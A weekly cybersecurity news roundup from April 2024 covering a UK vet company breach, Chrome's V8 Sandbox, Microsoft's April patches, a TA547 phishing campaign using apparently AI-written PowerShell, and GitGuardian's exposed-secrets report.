This Week in Cyber 12th April 2024

Analyst Insight

In this week's cybersecurity roundup, organisations faced ongoing challenges in safeguarding sensitive data and operations. CVS Group, a leading UK vet company, experienced a cyber incident resulting in disruption across operations and potential unauthorised access to personal information. This incident underscores the persistent threat cyberattacks pose to organisations' daily operations and data security. Meanwhile, Google introduced the V8 Sandbox in Chrome, led by Samuel Groß, to combat memory corruption issues. This innovative sandbox aims to contain memory corruption within the V8 engine, promising enhanced security for Chrome users worldwide. Additionally, Microsoft addressed a record 149 vulnerabilities in its April patch release, including actively exploited zero-days. This comprehensive effort reflects the ongoing battle against evolving cyber threats and underscores the importance of timely updates for system security.

However, cybercriminals employing sophisticated AI techniques targeted organisations in Germany, posing new challenges in detecting and mitigating cyber threats effectively. Despite defenders' efforts, the use of AI-generated content highlights the need for continuous vigilance in cybersecurity practices. Furthermore, GitGuardian's annual report revealed concerning trends in exposed credentials on GitHub and PyPI, emphasising the critical importance of proactive measures to mitigate risks and safeguard sensitive information from potential exploitation by malicious actors. As cybersecurity threats continue to evolve, organisations must remain vigilant and prioritise robust security measures to protect against emerging threats and ensure the integrity of their data and operations.

Cyber Incident Disrupts Operations at UK Vet Company CVS Group

CVS Group, one of the UK's largest vet companies, experienced a cyber incident resulting in disruption across all operations and potential unauthorised access to personal information. The incident, detected on Monday morning, involved limited unauthorised access to company IT systems. The Information Commissioner's Office was notified due to the risk of malicious access to personal data. Efforts to contain the attack caused operational disruption, with some IT systems temporarily taken offline. While most veterinary care continued, some IT systems are not functioning efficiently, impacting vet practice operations. CVS Group, which owns numerous vet practices, diagnostic laboratories, and pet crematoriums, is listed on the London Stock Exchange and operates in the Netherlands, Ireland, and Australia, where operations were unaffected by the attack.

Google Introduces V8 Sandbox in Chrome to Address Memory Corruption Issues

Google has introduced the V8 Sandbox in Chrome to combat memory corruption issues. Led by Samuel Groß, the sandbox aims to contain memory corruption within the V8 engine. It limits V8's code execution to a subset of the process's memory, mitigating vulnerabilities. Despite challenges, the sandbox isolates V8's heap memory, preventing corruption from spreading. It adds minimal overhead and will be enabled by default in Chrome 123. The sandbox requires a 64-bit system and addresses the limitations of current memory safety technologies. Google also emphasises the role of Kernel Address Sanitizer (KASan) in detecting memory bugs and enhancing Android firmware security.

Microsoft Fixes 149 Flaws in April Patch Release, Including Actively Exploited Zero-Days

In a massive April patch release, Microsoft has remediated a total of 149 vulnerabilities, marking a record for the month. Among these flaws, two have been sighted being actively exploited in the wilds. The vulnerabilities include three critical, 142 important, three moderate, and one low-severity issue. Notably, the company addressed 21 vulnerabilities in its Chromium-based Edge browser as well. The actively exploited vulnerabilities are CVE-2024-26234, a proxy driver spoofing flaw, and CVE-2024-29988, a SmartScreen prompt security feature bypass.

While Microsoft's advisory lacks details about CVE-2024-26234, cybersecurity firm Sophos uncovered a malicious executable signed with a valid Microsoft certificate. The malware, found in a tool called LaiXi Android Screen Mirroring, includes a component acting as a backdoor, allowing attackers to intercept network traffic. Another exploited flaw, CVE-2024-29988, enables attackers to bypass Microsoft Defender Smartscreen protections when launching malicious files. Additionally, cybersecurity firm Varonis outlined methods attackers could use to circumvent audit logs while exfiltrating files from SharePoint, urging organisations to closely monitor their audit logs for suspicious access events. This release also addresses CVE-2024-29990, an elevation of privilege flaw in Microsoft Azure Kubernetes Service Confidential Container. The disclosure comes amid criticism of Microsoft's security practices and follows the company's decision to publish root cause data for security flaws using the Common Weakness Enumeration (CWE) industry standard.

AI-Enhanced Cyberattacks Targeting German Organisations

Cybercriminals, identified as TA547, are using sophisticated tactics to target organisations in Germany. They're sending emails containing fake invoices in password-protected ZIP files, with the password provided in the email itself. Inside the ZIP file is an LNK file, which, when executed, triggers a PowerShell script acting as a dropper to execute Rhadamanthys, an information stealer. Notably, this PowerShell script appears to be generated by large language models (LLMs) like ChatGPT or CoPilot, evidenced by detailed comments in the code. This marks one of the first instances of AI-generated code being used in cyberattacks.

The shift to using LLMs in cyberattacks suggests that threat actors are becoming more sophisticated, using AI to generate social engineering lures and code to scale malicious activities. However, in the case of TA547 attacks, the AI-generated content did not change the functionality of the malware itself. TA547 is a financially motivated cybercriminal group known for targeting various regions, including Germany, Spain, Switzerland, Austria, and the US. Despite the evolving tactics, defenders have been able to detect and mitigate these attacks effectively.

GitGuardian's State of Secrets Sprawl: Insights into Exposed Credentials on GitHub and PyPI

In their annual report, GitGuardian uncovered concerning trends in exposed credentials across GitHub and PyPI. While GitHub saw a staggering 12.8 million new exposed secrets, PyPI also faced significant issues, with over 11,000 unique secrets discovered. What's worrisome is that some of these secrets, introduced as far back as 2017, remained valid years later. GitGuardian emphasised the importance of automating checks and promptly revoking leaked secrets. They highlighted the risks associated with exposed secrets, urging developers to avoid storing them in plain text, limit their privileges, and implement automated solutions. These measures are crucial for mitigating the risks of secret exposure and safeguarding projects from potential exploitation by malicious actors.